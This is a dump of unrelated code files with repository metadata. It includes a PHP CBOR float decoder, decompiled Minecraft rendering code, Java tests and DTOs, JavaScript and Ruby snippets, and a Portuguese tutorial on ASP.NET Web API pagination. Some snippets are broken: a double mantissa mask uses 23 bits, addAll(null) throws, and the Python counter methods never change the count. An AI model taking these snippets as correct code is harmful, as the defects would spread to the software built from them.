* @return DoublePrecisionFloatObject
*/
public static function create(string $value): self
{
if (8 !== mb_strlen($value, '8bit')) {
throw new InvalidArgumentException('The value is not a valid double precision floating point');
}
return new self(27, $value);
}
public function getNormalizedData(bool $ignoreTags = false)
{
$data = $this->data;
Assertion::string($data, 'Invalid data');
$single = gmp_init(bin2hex($data), 16);
$exp = gmp_intval($this->bitwiseAnd($this->rightShift($single, 52), gmp_init('7ff', 16)));
$mant = gmp_intval($this->bitwiseAnd($single, gmp_init('fffffffffffff', 16)));
$sign = gmp_intval($this->rightShift($single, 63));
if (0 === $exp) {
$val = $mant * 2 ** (-(1022 + 52));
} elseif (0b11111111111 !== $exp) {
$val = ($mant + (1 << 52)) * 2 ** ($exp - (1023 + 52));
} else {
$val = 0 === $mant ? INF : NAN;
}
return 1 === $sign ? -$val : $val;
}
public function getExponent(): int
{
$data = $this->data;
Assertion::string($data, 'Invalid data');
$single = gmp_intval(gmp_init(bin2hex($data), 16));
return ($single >> 52) & 0x7ff;
}
public function getMantissa(): int
{
$data = $this->data;
Assertion::string($data, 'Invalid data');
$single = gmp_intval(gmp_init(bin2hex($data), 16));
return $single & 0x7fffff;
}
public function getSign(): int
{
$data = $this->data;
Assertion::string($data, 'Invalid data');
$single = gmp_intval(gmp_init(bin2hex($data), 16));
return 1 === ($single >> 63) ? -1 : 1;
}
private function rightShift(\GMP $number, int $positions): \GMP
{
return gmp_div($number, gmp_pow(gmp_init(2, 10), $positions));
}
private function bitwiseAnd(\GMP $first, \GMP $other): \GMP
{
return gmp_and($first, $other);
}
}
|
Java
|
UTF-8
| 1,765 | 1.671875 | 2 |
[] |
no_license
|
// Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.kpdus.com/jad.html
// Decompiler options: packimports(3) braces deadcode fieldsfirst
package net.minecraft.src;
// Referenced classes of package net.minecraft.src:
// RenderLiving, EntityPig, ModelBase, EntityLiving,
// Entity
public class RenderPig extends RenderLiving
{
public RenderPig(ModelBase p_i3197_1_, ModelBase p_i3197_2_, float p_i3197_3_)
{
super(p_i3197_1_, p_i3197_3_);
func_77042_a(p_i3197_2_);
}
protected int func_77099_a(EntityPig p_77099_1_, int p_77099_2_, float p_77099_3_)
{
func_76985_a("/mob/saddle.png");
return p_77099_2_ != 0 || !p_77099_1_.func_70901_n() ? -1 : 1;
}
public void func_77098_a(EntityPig p_77098_1_, double p_77098_2_, double p_77098_4_, double p_77098_6_,
float p_77098_8_, float p_77098_9_)
{
super.func_77031_a(p_77098_1_, p_77098_2_, p_77098_4_, p_77098_6_, p_77098_8_, p_77098_9_);
}
protected int func_77032_a(EntityLiving p_77032_1_, int p_77032_2_, float p_77032_3_)
{
return func_77099_a((EntityPig)p_77032_1_, p_77032_2_, p_77032_3_);
}
public void func_77031_a(EntityLiving p_77031_1_, double p_77031_2_, double p_77031_4_, double p_77031_6_,
float p_77031_8_, float p_77031_9_)
{
func_77098_a((EntityPig)p_77031_1_, p_77031_2_, p_77031_4_, p_77031_6_, p_77031_8_, p_77031_9_);
}
public void func_76986_a(Entity p_76986_1_, double p_76986_2_, double p_76986_4_, double p_76986_6_,
float p_76986_8_, float p_76986_9_)
{
func_77098_a((EntityPig)p_76986_1_, p_76986_2_, p_76986_4_, p_76986_6_, p_76986_8_, p_76986_9_);
}
}
|
PHP
|
UTF-8
| 694 | 2.53125 | 3 |
[] |
no_license
|
<?php
namespace Craft;
class DirectoryContents_FileModel extends BaseComponentModel
{
public function __toString()
{
return $this->path;
}
protected function defineAttributes()
{
return array(
'name' => AttributeType::String,
'niceName' => AttributeType::String,
'fileName' => AttributeType::String,
'path' => AttributeType::String,
'parentFolder' => AttributeType::String,
'niceParentFolder' => AttributeType::String,
'extension' => AttributeType::String,
'size' => AttributeType::Number,
'created' => AttributeType::Number,
'modified' => AttributeType::Number,
);
}
}
|
Java
|
UTF-8
| 3,443 | 2.234375 | 2 |
[] |
no_license
|
package pl.edu.agh.speedgame;
import org.json.JSONObject;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.powermock.core.classloader.annotations.PrepareForTest;
import org.powermock.modules.junit4.PowerMockRunner;
import pl.edu.agh.speedgame.dao.OurSessionReplacement;
import pl.edu.agh.speedgame.dao.SessionFactorySingleton;
import pl.edu.agh.speedgame.dto.User;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import java.io.PrintWriter;
import static org.junit.Assert.fail;
import static org.mockito.Matchers.eq;
import static org.mockito.Mockito.verify;
import static org.mockito.Mockito.when;
import static org.powermock.api.mockito.PowerMockito.*;
@RunWith(PowerMockRunner.class)
@PrepareForTest({SessionFactorySingleton.class, OurSessionReplacement.class})
public class LoginServletTest {
private HttpServletRequest request;
private HttpServletResponse response;
private OurSessionReplacement hibernateSession;
private HttpSession httpSession;
private User user;
@Before
public void setUp() {
request = createLoginRequestMock();
hibernateSession = createOurSessionReplacementMock();
httpSession = mock(HttpSession.class);
when(request.getSession()).thenReturn(httpSession);
user = new User.UserBuilder().login("bob").password("ala").email("ccc").avatar("lal").ring("obo").build();
when(hibernateSession.get(User.class, "bob")).thenReturn(user);
response = mock(HttpServletResponse.class);
}
@Test
public void testLogin() throws Exception {
// given
// standard setup
// when
new LoginServlet().doPost(request, response);
// then
verify(httpSession).setAttribute(eq("user"), eq(user));
verify(response).sendRedirect("/jsp/logged.jsp");
}
@Test
public void testExists() throws Exception {
// given
when(request.getParameter("exists")).thenReturn("true");
PrintWriter printWriterMock = mock(PrintWriter.class);
when(response.getWriter()).thenReturn(printWriterMock);
JSONObject object = new JSONObject();
object.put("login", user.getLogin());
object.put("email", user.getEmail());
object.put("avatar", user.getAvatar());
object.put("ring", user.getRing());
// when
new LoginServlet().doPost(request, response);
// then
verify(response).setContentType("application/json");
verify(printWriterMock).write(object.toString());
}
private OurSessionReplacement createOurSessionReplacementMock() {
SessionFactorySingleton factoryMock = mock(SessionFactorySingleton.class);
mockStatic(SessionFactorySingleton.class);
when(SessionFactorySingleton.getInstance()).thenReturn(factoryMock);
OurSessionReplacement hibernateSession = mock(OurSessionReplacement.class);
when(factoryMock.createSessionReplacement()).thenReturn(hibernateSession);
return hibernateSession;
}
private HttpServletRequest createLoginRequestMock() {
HttpServletRequest request = mock(HttpServletRequest.class);
when(request.getParameter("login")).thenReturn("bob");
when(request.getParameter("password")).thenReturn("ala");
return request;
}
}
|
Java
|
UTF-8
| 974 | 2.703125 | 3 |
[] |
no_license
|
package com.rmi.distance;
import java.util.ArrayList;
import java.util.List;
public class MapDistance {
private static double EARTH_RADIUS = 6378.137;
private static double rad(double d) {
return d * Math.PI / 180.0;
}
public static void main(String[] args) {
/*Double lat1 = 30.470476;
Double lng1 = 114.321763;
Double lat2 = 30.473861;
Double lng2 = 119.325169;
double radLat1 = rad(lat1);
double radLat2 = rad(lat2);
double difference = radLat1 - radLat2;
double mdifference = rad(lng1) - rad(lng2);
double distance = 2 * Math.asin(Math.sqrt(Math.pow(Math.sin(difference / 2), 2)
+ Math.cos(radLat1) * Math.cos(radLat2)
* Math.pow(Math.sin(mdifference / 2), 2)));
distance = distance * EARTH_RADIUS * 1000;
System.out.println(distance<300*1.1);*/
List<String> all = new ArrayList<>();
all.addAll(null);
}
}
|
Java
|
UTF-8
| 5,457 | 1.71875 | 2 |
[
"Apache-2.0"
] |
permissive
|
package com.capsilon.automation.aus.dto;
import com.fasterxml.jackson.annotation.*;
import java.util.HashMap;
import java.util.Map;
@JsonInclude(JsonInclude.Include.NON_NULL)
@JsonPropertyOrder({
"first_pand_iqualifying",
"negative_net_rental",
"second_pand_i",
"subj_neg_cash_flow",
"hazard_insurance",
"all_other_payments",
"taxes",
"total_expense_payment",
"mortgage_insurance",
"hoa_fees",
"present_principal_housing_payment",
"other",
"total_housing_payment"
})
public class ProposedMonthlyPayment {
@JsonProperty("first_pand_iqualifying")
private Double firstPandIqualifying;
@JsonProperty("negative_net_rental")
private Double negativeNetRental;
@JsonProperty("second_pand_i")
private Double secondPandI;
@JsonProperty("subj_neg_cash_flow")
private Double subjNegCashFlow;
@JsonProperty("hazard_insurance")
private Double hazardInsurance;
@JsonProperty("all_other_payments")
private Double allOtherPayments;
@JsonProperty("taxes")
private Double taxes;
@JsonProperty("total_expense_payment")
private Double totalExpensePayment;
@JsonProperty("mortgage_insurance")
private Double mortgageInsurance;
@JsonProperty("hoa_fees")
private Double hoaFees;
@JsonProperty("present_principal_housing_payment")
private Double presentPrincipalHousingPayment;
@JsonProperty("other")
private Double other;
@JsonProperty("total_housing_payment")
private Double totalHousingPayment;
@JsonIgnore
private Map<String, Object> additionalProperties = new HashMap<>();
@JsonProperty("first_pand_iqualifying")
public Double getFirstPandIqualifying() {
return firstPandIqualifying;
}
@JsonProperty("first_pand_iqualifying")
public void setFirstPandIqualifying(Double firstPandIqualifying) {
this.firstPandIqualifying = firstPandIqualifying;
}
@JsonProperty("negative_net_rental")
public Double getNegativeNetRental() {
return negativeNetRental;
}
@JsonProperty("negative_net_rental")
public void setNegativeNetRental(Double negativeNetRental) {
this.negativeNetRental = negativeNetRental;
}
@JsonProperty("second_pand_i")
public Double getSecondPandI() {
return secondPandI;
}
@JsonProperty("second_pand_i")
public void setSecondPandI(Double secondPandI) {
this.secondPandI = secondPandI;
}
@JsonProperty("subj_neg_cash_flow")
public Double getSubjNegCashFlow() {
return subjNegCashFlow;
}
@JsonProperty("subj_neg_cash_flow")
public void setSubjNegCashFlow(Double subjNegCashFlow) {
this.subjNegCashFlow = subjNegCashFlow;
}
@JsonProperty("hazard_insurance")
public Double getHazardInsurance() {
return hazardInsurance;
}
@JsonProperty("hazard_insurance")
public void setHazardInsurance(Double hazardInsurance) {
this.hazardInsurance = hazardInsurance;
}
@JsonProperty("all_other_payments")
public Double getAllOtherPayments() {
return allOtherPayments;
}
@JsonProperty("all_other_payments")
public void setAllOtherPayments(Double allOtherPayments) {
this.allOtherPayments = allOtherPayments;
}
@JsonProperty("taxes")
public Double getTaxes() {
return taxes;
}
@JsonProperty("taxes")
public void setTaxes(Double taxes) {
this.taxes = taxes;
}
@JsonProperty("total_expense_payment")
public Double getTotalExpensePayment() {
return totalExpensePayment;
}
@JsonProperty("total_expense_payment")
public void setTotalExpensePayment(Double totalExpensePayment) {
this.totalExpensePayment = totalExpensePayment;
}
@JsonProperty("mortgage_insurance")
public Double getMortgageInsurance() {
return mortgageInsurance;
}
@JsonProperty("mortgage_insurance")
public void setMortgageInsurance(Double mortgageInsurance) {
this.mortgageInsurance = mortgageInsurance;
}
@JsonProperty("hoa_fees")
public Double getHoaFees() {
return hoaFees;
}
@JsonProperty("hoa_fees")
public void setHoaFees(Double hoaFees) {
this.hoaFees = hoaFees;
}
@JsonProperty("present_principal_housing_payment")
public Double getPresentPrincipalHousingPayment() {
return presentPrincipalHousingPayment;
}
@JsonProperty("present_principal_housing_payment")
public void setPresentPrincipalHousingPayment(Double presentPrincipalHousingPayment) {
this.presentPrincipalHousingPayment = presentPrincipalHousingPayment;
}
@JsonProperty("other")
public Double getOther() {
return other;
}
@JsonProperty("other")
public void setOther(Double other) {
this.other = other;
}
@JsonProperty("total_housing_payment")
public Double getTotalHousingPayment() {
return totalHousingPayment;
}
@JsonProperty("total_housing_payment")
public void setTotalHousingPayment(Double totalHousingPayment) {
this.totalHousingPayment = totalHousingPayment;
}
@JsonAnyGetter
public Map<String, Object> getAdditionalProperties() {
return this.additionalProperties;
}
@JsonAnySetter
public void setAdditionalProperty(String name, Object value) {
this.additionalProperties.put(name, value);
}
}
|
Python
|
UTF-8
| 296 | 2.859375 | 3 |
[] |
no_license
|
import pytest
from solutions.p3 import largest_prime_factor
def test_1():
assert largest_prime_factor(2) == 2
def test_2():
assert largest_prime_factor(25) == 5
def test_4():
assert largest_prime_factor(7833) == 373
def test_3():
assert largest_prime_factor(13195) == 29
|
JavaScript
|
UTF-8
| 797 | 2.703125 | 3 |
[] |
no_license
|
const Engine = Matter.Engine;
const World = Matter.World;
const Bodies = Matter.Bodies;
const Body = Matter.Body;
var papper;
var ground;
var box1,box2,box3;
function preload()
{
}
function setup() {
createCanvas(800, 700);
engine = Engine.create();
world = engine.world;
//Create the Bodies Here.
papper=new Papper(50,600);
box1=new Box(600,600,20,100);
box2=new Box(750,600,20,100);
box3=new Box(670,630,200,20);
ground=new Ground(400,650,800,20);
Engine.run(engine);
}
function draw() {
rectMode(CENTER);
background(0);
box1. display();
box2.display();
box3.display();
ground.display();
papper.display();
}
function keyPressed() {
if (keyCode === UP_ARROW) {
Matter.Body.applyForce(papper.body,papper.body.position,{x:50,y:-85})
}
}
|
Java
|
UTF-8
| 5,555 | 2.171875 | 2 |
[] |
no_license
|
/*
* Copyright (c) 2002-2017 "Neo Technology,"
* Network Engine for Objects in Lund AB [http://neotechnology.com]
*
* This file is part of Neo4j.
*
* Neo4j is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package org.neo4j.server.rest.repr;
import java.util.ArrayList;
import java.util.Collection;
import java.util.LinkedList;
import java.util.List;
import org.neo4j.graphdb.ConstraintViolationException;
import org.neo4j.helpers.collection.IterableWrapper;
import org.neo4j.kernel.api.exceptions.Status;
import org.neo4j.server.rest.transactional.error.Neo4jError;
public class ExceptionRepresentation extends MappingRepresentation
{
private final List<Neo4jError> errors = new LinkedList<>();
private boolean includeLegacyRepresentation;
public ExceptionRepresentation( Throwable exception )
{
this( exception, true );
}
public ExceptionRepresentation( Throwable exception, boolean includeLegacyRepresentation )
{
super( RepresentationType.EXCEPTION );
this.errors.add( new Neo4jError( statusCode( exception ), exception ) );
this.includeLegacyRepresentation = includeLegacyRepresentation;
}
public ExceptionRepresentation( Neo4jError ... errors )
{
super( RepresentationType.EXCEPTION );
for ( Neo4jError exception : errors )
{
this.errors.add( exception );
}
}
@Override
protected void serialize( MappingSerializer serializer )
{
// For legacy reasons, this actually serializes into two separate formats - the old format, which simply
// serializes a single exception, and the new format which serializes multiple errors and provides simple
// status codes.
if ( includeLegacyRepresentation )
{
renderWithLegacyFormat( errors.get( 0 ).cause(), serializer );
}
renderWithStatusCodeFormat( serializer );
}
private void renderWithStatusCodeFormat( MappingSerializer serializer )
{
serializer.putList( "errors", ErrorEntryRepresentation.list( errors ) );
}
private void renderWithLegacyFormat( Throwable exception, MappingSerializer serializer )
{
String message = exception.getMessage();
if ( message != null )
{
serializer.putString( "message", message );
}
serializer.putString( "exception", exception.getClass().getSimpleName() );
serializer.putString( "fullname", exception.getClass().getName() );
StackTraceElement[] trace = exception.getStackTrace();
if ( trace != null )
{
Collection<String> lines = new ArrayList<String>( trace.length );
for ( StackTraceElement element : trace )
{
if ( element.toString().matches( ".*(jetty|jersey|sun\\.reflect|mortbay|javax\\.servlet).*" ) )
{
continue;
}
lines.add( element.toString() );
}
serializer.putList( "stackTrace", ListRepresentation.string( lines ) );
}
Throwable cause = exception.getCause();
if ( cause != null )
{
serializer.putMapping( "cause", new ExceptionRepresentation( cause ) );
}
}
private static class ErrorEntryRepresentation extends MappingRepresentation
{
private final Neo4jError error;
ErrorEntryRepresentation( Neo4jError error )
{
super( "error-entry" );
this.error = error;
}
@Override
protected void serialize( MappingSerializer serializer )
{
serializer.putString( "code", error.status().code().serialize() );
serializer.putString( "message", error.getMessage() );
if ( error.shouldSerializeStackTrace() )
{
serializer.putString( "stackTrace", error.getStackTraceAsString() );
}
}
public static ListRepresentation list( Collection<Neo4jError> errors )
{
return new ListRepresentation( "error-list", new IterableWrapper<ErrorEntryRepresentation, Neo4jError>( errors )
{
@Override
protected ErrorEntryRepresentation underlyingObjectToObject( Neo4jError error )
{
return new ErrorEntryRepresentation( error );
}
} );
}
}
private static Status statusCode( Throwable current )
{
while ( current != null )
{
if ( current instanceof Status.HasStatus )
{
return ((Status.HasStatus) current).status();
}
if ( current instanceof ConstraintViolationException )
{
return Status.Schema.ConstraintValidationFailed;
}
current = current.getCause();
}
return Status.General.UnknownError;
}
}
|
JavaScript
|
UTF-8
| 354 | 3.453125 | 3 |
[] |
no_license
|
/**
* IIFE ('iffy')
* Immediately invoted function expression
*
* Immediately = right away
* Invoked = run
* Function = ...function...
* Expression = ...expression...
*
* A function that we write and run at the same time
*/
(function () {
window.addEventListener('load', function () {
console.log('page is loaded')
});
}());
|
Python
|
UTF-8
| 204 | 2.859375 | 3 |
[
"Apache-2.0"
] |
permissive
|
class contador():
def __init__(self,recuento):
self.recuento = recuento
def incrementar(self):
self.recuento +1
def decrementar(self):
self.recuento -1
c = contador(0)
|
Ruby
|
UTF-8
| 2,501 | 2.734375 | 3 |
[
"MIT"
] |
permissive
|
class StateWorkflow::StateDefinitions
#Specify the name of the var/method to be available in validations for reference the thing on which these state apply
def self.these_are_states_for(stateful_object_name)
self.class_eval do
cattr_accessor :stateful_object_name
end
self.stateful_object_name = stateful_object_name
end
#Specify the intial state that should be set on new instances of this object (State is expected to be required)
def self.initial_state(initial_state_name)
self.class_eval do
cattr_accessor :initial_state_name
end
self.initial_state_name = initial_state_name
end
def self.run_includes(on_class)
on_class.class_eval do
class << self
include StateWorkflow::StatefulObjectClassMethods
end
include StateWorkflow::StatefulObjectInstanceMethods
end
end
def self.definition_context_class
StateWorkflow::State::DefinitionContext
end
#Define a new state
def self.state(state_name, human_name = nil, &block)
human_name_proc = nil
if human_name
human_name_proc = Proc.new{ human_name.to_s }
elsif self.respond_to?(:display_proc_for_state_name)
human_name_proc = Proc.new{ self.display_proc_for_state_name.call(state_name).to_s }
else
human_name_proc = Proc.new{ state_name.to_s.humanize }
end
self.class_eval do
cattr_accessor :all_states
cattr_accessor :states_in_order
end
self.all_states ||= {}
self.states_in_order ||= []
new_state = StateWorkflow::State.new(state_name.to_sym, human_name_proc, self)
context = self.definition_context_class.new(new_state, @just_defined_state)
context.instance_eval(&block)
context.apply_to_state_definition!
self.all_states[state_name.to_sym] = new_state
self.states_in_order << new_state
@just_defined_state = new_state
end
def self.non_workflow_state(state_name, human_name = nil, &block)
state(state_name, human_name, &block)
@just_defined_state.previous_state = nil
@just_defined_state.next_state = nil
@just_defined_state = nil
end
def self.display_name_for_state(&block)
self.class_eval do
cattr_accessor :display_proc_for_state_name
end
self.display_proc_for_state_name = block
end
def self.compose_validation_error_as(&block)
self.class_eval do
cattr_accessor :compose_proc_for_validation_errors
end
self.compose_proc_for_validation_errors = block
end
end
|
JavaScript
|
UTF-8
| 1,562 | 2.546875 | 3 |
[
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
//
// MonoHMD.js
//
// Created by Chris Collins on 10/5/15
// Copyright 2015 High Fidelity, Inc.
//
// This script allows you to switch between mono and stereo mode within the HMD.
// It will add adition menu to Tools called "IPD".
//
// Distributed under the Apache License, Version 2.0.
// See the accompanying file LICENSE or http://www.apache.org/licenses/LICENSE-2.0.html
function setupipdMenu() {
if (!Menu.menuExists("Tools > IPD")) {
Menu.addMenu("Tools > IPD");
}
if (!Menu.menuItemExists("Tools > IPD", "Stereo")) {
Menu.addMenuItem({
menuName: "Tools > IPD",
menuItemName: "Stereo",
isCheckable: true,
isChecked: true
});
}
if (!Menu.menuItemExists("Tools > IPD", "Mono")) {
Menu.addMenuItem({
menuName: "Tools > IPD",
menuItemName: "Mono",
isCheckable: true,
isChecked: false
});
}
}
function menuItemEvent(menuItem) {
if (menuItem == "Stereo") {
Menu.setIsOptionChecked("Mono", false);
HMD.ipdScale = 1.0;
}
if (menuItem == "Mono") {
Menu.setIsOptionChecked("Stereo", false);
HMD.ipdScale = 0.0;
}
}
function scriptEnding() {
Menu.removeMenuItem("Tools > IPD", "Stereo");
Menu.removeMenuItem("Tools > IPD", "Mono");
Menu.removeMenu("Tools > IPD");
//reset the HMD to stereo mode
HMD.setIPDScale(1.0);
}
setupipdMenu();
Menu.menuItemEvent.connect(menuItemEvent);
Script.scriptEnding.connect(scriptEnding);
|
Markdown
|
UTF-8
| 20,342 | 2.921875 | 3 |
[] |
no_license
|
# Paginação de Dados
Nesse repositório implementamos ==paginação== de dados com ASP.NET 5 Web API. Nesse projeto utilizamos o Padrão Repositório (*Repository Patern*) e Repositório Genérico (*GenericRepository*) junto ao ORM *Entity Framework* para acessar os dados no banco.
O projeto tem a seguinte estrutura:
```xml
PagProj
│ appsettings.Development.json
│ appsettings.json
│ PagProj.csproj
│ Program.cs
│ Startup.cs
│
├───Business
│ │ StudentBusiness.cs
│ │
│ └───Interface
│ IStudentBusiness.cs
│
├───Controllers
│ StudentController.cs
│
├───Models
│ │ BaseEntity.cs
│ │ Student.cs
│ │
│ ├───Context
│ │ ApplicationContext.cs
│ │
│ └───Pagination
│ PagedList.cs
│ PaginationParameters.cs
│
└───Repository
│ GenericRepository.cs
│
├───Interface
│ IRepository.cs
│
└───Scripts
students.sql
```
Para demostrar paginação, usamos o modelo `Student`:
```C#
using System;
using System.ComponentModel.DataAnnotations.Schema;
namespace PagProj.Models
{
[Table("students")]
public class Student : BaseEntity
{
[Column("full_name")]
public string FullName { get; set; }
[Column("birth_date")]
public DateTime BirthDate { get; set; }
[Column("document")]
public string Document { get; set; }
[Column("phone_number")]
public string PhoneNumber { get; set; }
[Column("full_address")]
public string FullAddress { get; set; }
}
}
```
Esse modelo, herda de `BaseEntity`:
```C#
using System.ComponentModel.DataAnnotations;
using System.ComponentModel.DataAnnotations.Schema;
namespace PagProj.Models {
public class BaseEntity {
[Key]
[Column("id")]
public long Id { get; set; }
}
}
```
> O modelo `BaseEntity` é utilizado para limitar o `GenericRepository`. Todas os modelos do domínio terão herança desta classe, que assim como no banco de dados, todas elas tem uma coluna `id`.
Na pasta ==Repository > Scripts== contém o Script para construção do banco de dados de `students`:
```sql
CREATE DATABASE paginationdb;
USE paginationdb;
CREATE TABLE students (
id INT(11) NOT NULL AUTO_INCREMENT,
full_name VARCHAR(100) NOT NULL DEFAULT '0',
birth_date DATE NULL DEFAULT NULL,
document VARCHAR(100) NOT NULL DEFAULT '0',
phone_number VARCHAR(100) NOT NULL DEFAULT '0',
full_address VARCHAR(130) NOT NULL DEFAULT '0',
PRIMARY KEY (id)
)
ENGINE=InnoDB DEFAULT CHARSET=LATIN1;
insert into students (full_name, birth_date, document, phone_number, full_address) values ('Bobby', '2021-02-08', '154937604-7', '117-452-5548', '367 Tony Road');
insert into students (full_name, birth_date, document, phone_number, full_address) values ('Jaime', '2022-08-06', '703467618-6', '812-655-7525', '5 Gulseth Drive');
insert into students (full_name, birth_date, document, phone_number, full_address) values ('Patty', '2021-01-01', '443424220-2', '320-889-9198', '5 Waubesa Plaza');
...
...
```
> Além de criar, essa base de dados insere 1000 linhas a tabela `students`.
# Parâmetros de Paginação
Para definir uma paginação são necessário dois atributos principais, são eles:
- `PageSize` que se trata da quantidade de registros por página;
- `PageNumber` que se trata da página corrente de acesso.
Esses atributos precisam ser definidos na requisição, e para isso, criamos um modelo `PaginationParameters` que armazenamos na ==Models > Pagination==. Veja como é definida:
```C#
namespace PagProj.Models.Pagination {
public class PaginationParameters {
const int MAX_PAGE_SIZE = 50;
private int _pageSize = 10;
public int PageNumber { get; set; } = 1;
public int PageSize {
get => _pageSize;
set => _pageSize = value > MAX_PAGE_SIZE? MAX_PAGE_SIZE : value;
}
public PaginationParameters() { }
public PaginationParameters(int pageNumber, int pageSize)
{
this.PageNumber = pageNumber;
this.PageSize = pageSize;
}
}
}
```
Nela contém os seguintes atributos:
- `MAX_PAGE_SIZE` informa a quantidade máxima de registros por página `PageSize` que o *client* pode solicitar. No exemplos limitamos a 50 registros por página;
- `_pageSize` uma variável privada (que se inicia com 10) que receberá a quantidade de registros por página;
- A propriedade `PageNumber` que é a página corrente solicitado pelo *client*;
- A propriedade `PageSize` que irá tratar o valor de `_pageSize` quando atribuir um valor a ela. Basicamente é feita uma verificação (linha 11), onde se o valor que o *client* atribui ultrapassar o limite máximo `MAX_PAGE_SIZE`, este será o `_pageSize`, caso contrário, será o valor que o usuário inseriu.
## Recebendo os Parâmetros no Controller
A seguir veremos a implementação do nosso método `Get` usando paginação. Para isso, criamos o *controller* `StudentController`:
```C#
using System.Text.Json;
using Microsoft.AspNetCore.Mvc;
using PagProj.Business.Interface;
using PagProj.Models.Pagination;
namespace PagProj.Controllers
{
[ApiController]
[Route("api/[controller]")]
public class StudentController : ControllerBase
{
private readonly IStudentBusiness _studentBusiness;
public StudentController(IStudentBusiness studentBusiness)
{
_studentBusiness = studentBusiness;
}
[HttpGet("{PageNumber}/{PageSize}")]
public IActionResult Get([FromRoute] PaginationParameters paginationParameters)
{
var students = _studentBusiness.GetAll(paginationParameters);
var metadata = new {
students.TotalCount,
students.PageSize,
students.CurrentPage,
students.HasNext,
students.HasPrevious,
students.TotalPages
};
Response.Headers.Add("X-Pagination", JsonSerializer.Serialize(metadata));
return Ok(students);
}
}
```
E podemos fazer algumas observações sobre o código:
- Observe que na rota precisamos informar o `PageNumber`(página corrente) e o `PageSize`(elementos por página) e automaticamente esses valores são atribuídos ao parâmetro `paginationParameters`. Especificamos `[FromRoute]` para indicar que os dados vem especificamente da rota;
- Esses dados de paginação `paginationParameters` são enviados a camada de negócio `StudentBusiness` (que veremos logo abaixo) que retorna um objeto do tipo `PagedList` (objeto o qual iremos criar posteriormente);
- É construído um objeto anônimo com os dados de paginação do `PagedList` retornado e na linha 33 enviado ao `HEADER` *response* da requisição;
- Finalmente retornamos ao usuário um `Ok` informando o `PagedList students` com os estudantes.
# Camada de Negócio Business
A camada de negócio não terá nada de anormal, será composta pela interface `IStudentBusiness` e sua implementação `StudentBusiness` que veremos abaixo:
```C#
using PagProj.Models;
using PagProj.Models.Pagination;
namespace PagProj.Business.Interface
{
public interface IStudentBusiness
{
PagedList<Student> GetAll(PaginationParameters paginationParameters);
}
}
```
E sua implementação:
```C#
using PagProj.Business.Interface;
using PagProj.Models;
using PagProj.Models.Pagination;
using PagProj.Repository.Interface;
namespace PagProj.Business
{
public class StudentBusiness : IStudentBusiness
{
private readonly IRepository<Student> _repository;
public StudentBusiness(IRepository<Student> repository)
{
_repository = repository;
}
public PagedList<Student> GetAll(PaginationParameters paginationParameters)
{
return _repository.GetAll(paginationParameters);
}
}
}
```
Já podemos observar que o método `GetAll` recebe os parâmetros de paginação e retorna um `PagedList` do tipo `Student`.
# Criando o Tipo PagedList
A finalidade da paginação é retornar uma lista paginada e nada melhor que criarmos um tipo específico para isso. Para essa necessidade criamos o tipo genérico `PagedList`:
```C#
using System.Linq;
using System;
using System.Collections.Generic;
namespace PagProj.Models.Pagination
{
public class PagedList<T> : List<T>
{
public int CurrentPage { get; private set; }
public int TotalPages { get; private set; }
public int PageSize { get; private set; }
public int TotalCount { get; private set; }
public bool HasPrevious => CurrentPage > 1;
public bool HasNext => CurrentPage < TotalPages;
public PagedList(IQueryable<T> source, int pageNumber, int pageSize)
{
this.TotalCount = source.Count();
this.PageSize = pageSize;
this.CurrentPage = pageNumber;
this.TotalPages = (int)Math.Ceiling(TotalCount / (double)this.PageSize);
var items = source.Skip((this.CurrentPage - 1) * this.PageSize)
.Take(this.PageSize)
.ToList();
this.AddRange(items);
}
}
}
```
Observe que como se trata de um novo tipo derivado do `List`, precisamos especificar que ela herda de `List<T>`. Dessa forma a descrição da nossa classe fica `public class PagedList<T> : List<T>` enviando o tipo genérico `T` para o `List`.
Agora vamos entender todos os atributos desse novo tipo:
- O `CurrentPage` armazena o `PageNumber` (página corrente) solicitado pelo *client*;
- O `TotalPages` armazena a quantidade total de páginas baseado na quantidade total de registros `TotalCount` e na quantidade de registros por página `PageSize`;
- O `PageSize` armazena a quantidade de registros por página;
- O `TotalCount` armazena a quantidade total de registros;
- O `HasPrevious` indica `true` quando existe uma página anterior, `false` se não. Essa verificação é feita através do atributo `CurrentPage`, já que se a página corrente for menor ou igual a 1, não há como voltar;
- O `HasNext` indica `true` quando existe uma página posterior, `false` se não. E essa verificação é feita também através do `CurrentPage`, comparando-o com o total de páginas `TotalPages`. Se o `CurrentPage` for menor que o total de páginas é porque não chegamos a página final, logo retorna `true`, se for maior ou igual retorna `false`.
Além de descrever os atributos desse novo tipo, precisamos explicar o seu único construtor, e também segue características particulares do tipo:
- O construtor recebe via parâmetro um objeto do tipo `IQueryable<T>`. Esse tipo pertence ao namespace `Linq` que representa a *query*. O tipo `IQueryable<T>` é uma superclasse do `DbSet` e através deste parâmetro receberá um;
- O construtor também recebe o `pageNumber` e atribui ao `CurrentPage` e também recebe `pageSize` atribuindo ao `PageSize`;
- Para obter o `TotalCount`, ou seja, a quantidade de registros, é utilizado o método `Count` de `IQueryable<T> source`;
- Para calcular `TotalPages` dividimos o total de registros `TotalCount` pela quantidade de registros por página, usamos `Math.Ceiling` para arredondar o número da divisão pra cima. Para atribuir ao `TotalPages` pegamos a parte inteira do valor retornado pelo `Math.Ceiling`;
Finalmente chegamos a cereja do bolo: a partir da *query* `IQueryable<T> source` usamos os métodos LINQ `Skip` e `Take` para retornar os dados paginados da sessão especificada por `CurrentPage` e `PageSize`:
- O método `Skip` indica a partir de qual local serão retornado os dados, e para isso, podemos pegar o momento inicial da paginação multiplicando `CurrentPage - 1` pela quantidade de elementos por página `PageSize`.
- Se por exemplo, estamos na página 10 (`CurrentPage = 10`) e estamos solicitando 20 registros por página (`PageSize = 20`), o primeiro registro dessa página encontra-se em $$(10 - 1) * 20 = 180$$, ou seja, na posição 180.
